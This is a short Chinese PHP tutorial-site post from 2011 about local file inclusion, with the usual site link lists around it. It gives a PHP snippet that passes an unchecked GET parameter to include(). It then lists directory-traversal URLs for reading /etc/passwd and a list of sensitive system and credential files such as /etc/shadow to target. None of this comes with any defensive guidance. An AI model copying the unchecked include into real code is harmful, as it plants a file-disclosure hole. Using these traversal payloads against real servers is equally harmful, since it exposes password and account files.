编程 PHP

php 伪造本地文件包含漏洞的代码

Posted in PHP onNovember 03, 2011

代码:

<?php 
$page=$_GET['page']; 
include($page.'php'); 
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

php 伪造本地文件包含漏洞的代码

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

通过ODBC连接的SQL SERVER实例

Oct 09 PHP

DedeCms模板安装/制作概述

Mar 11 PHP

PHP中的session永不过期的解决思路及实现方法分享

Apr 20 PHP

比较好用的PHP防注入漏洞过滤函数代码

Apr 11 PHP

PHP读取大文件的类SplFileObject使用介绍

Apr 09 PHP

PHP实现的汉字拼音转换和公历农历转换类及使用示例

Jul 01 PHP

php利用cookie实现自动登录的方法

Dec 10 PHP

简单谈谈PHP中的Reload操作

Dec 12 PHP

PHP网站自动化配置的实现方法(必看)

May 27 PHP

利用php的ob缓存机制实现页面静态化方法

Jul 09 PHP

不常用但很实用的PHP预定义变量分析

Jun 25 PHP

Mac下关于PHP环境和扩展的安装详解

Oct 17 PHP

有关php运算符的知识大全

Nov 03 #PHP

PHP读取txt文件的内容并赋值给数组的代码

Nov 03 #PHP

PHP支持多种格式图片上传(支持jpg、png、gif)

Nov 03 #PHP

PHP安全防范技巧分享

Nov 03 #PHP

防止本地用户用fsockopen DDOS攻击对策

Nov 02 #PHP

PHP隐形一句话后门，和ThinkPHP框架加密码程序(base64_decode)

Nov 02 #PHP

php数组函数序列之krsort()- 对数组的元素键名进行降序排序,保持索引关系

Nov 02 #PHP

TOSHIBA(1) 灵敏度(1) 德劲(5) RP-F11(1) 频率(1) 手调机(1) 东芝(1) 高放电路(1) ICF-7600(1) 数调机(1)

You might like

php在线打包程序源码

2008/07/27 PHP

基于PHP5魔术常量与魔术方法的详解

2013/06/13 PHP

使用YII2框架实现微信公众号中表单提交功能

2017/09/04 PHP

PHP中使用mpdf 导出PDF文件的实现方法

2018/10/22 PHP

Jquery 学习笔记（一）

2009/10/13 Javascript

从jquery的过滤器.filter()方法想到的

2013/09/29 Javascript

简单实用的全选反选按钮例子

2013/10/18 Javascript

js实现通用的微信分享组件示例

2014/03/10 Javascript

node.js中的favicon.ico请求问题处理

2014/12/15 Javascript

JavaScript中var关键字的使用详解

2015/08/14 Javascript

Yarn的安装与使用详细介绍

2016/10/25 Javascript

使用Vue.js创建一个时间跟踪的单页应用

2016/11/28 Javascript

JavaScript实现图像模糊化的方法实例

2017/01/15 Javascript

vue+iview+less+echarts实战项目总结

2018/02/22 Javascript

Angular利用内容投射向组件输入ngForOf模板的方法

2018/03/05 Javascript

layui数据表格跨行自动合并的例子

2019/09/02 Javascript

小程序开发之模态框组件封装

2020/04/23 Javascript

python连接MySQL数据库实例分析

2015/05/12 Python

让Python代码更快运行的5种方法

2015/06/21 Python

学习python 之编写简单乘法运算题

2016/02/27 Python

python中logging库的使用总结

2017/10/18 Python

django rest framework之请求与响应(详解)

2017/11/06 Python

Python使用Matplotlib模块时坐标轴标题中文及各种特殊符号显示方法

2018/05/04 Python

python中使用zip函数出现错误的原因

2018/09/28 Python

python使用pandas抽样训练数据中某个类别实例

2020/02/28 Python

Python flask框架端口失效解决方案

2020/06/04 Python

Python和Bash结合在一起的方法

2020/11/13 Python

意大利咖啡、浓缩咖啡和浓缩咖啡机：illy caffe

2019/03/20 全球购物

教育科学研究生自荐信

2013/10/09 职场文书

读群众路线心得体会

2014/03/07 职场文书

现场施工员岗位职责

2014/03/10 职场文书

实习护士自荐信

2014/06/21 职场文书

幼儿园门卫岗位职责范本

2014/07/02 职场文书

中级会计大学生职业生涯规划书

2014/09/16 职场文书

《一面五星红旗》教学反思

2016/02/23 职场文书

JavaScript使用canvas绘制坐标和线

2021/04/28 Javascript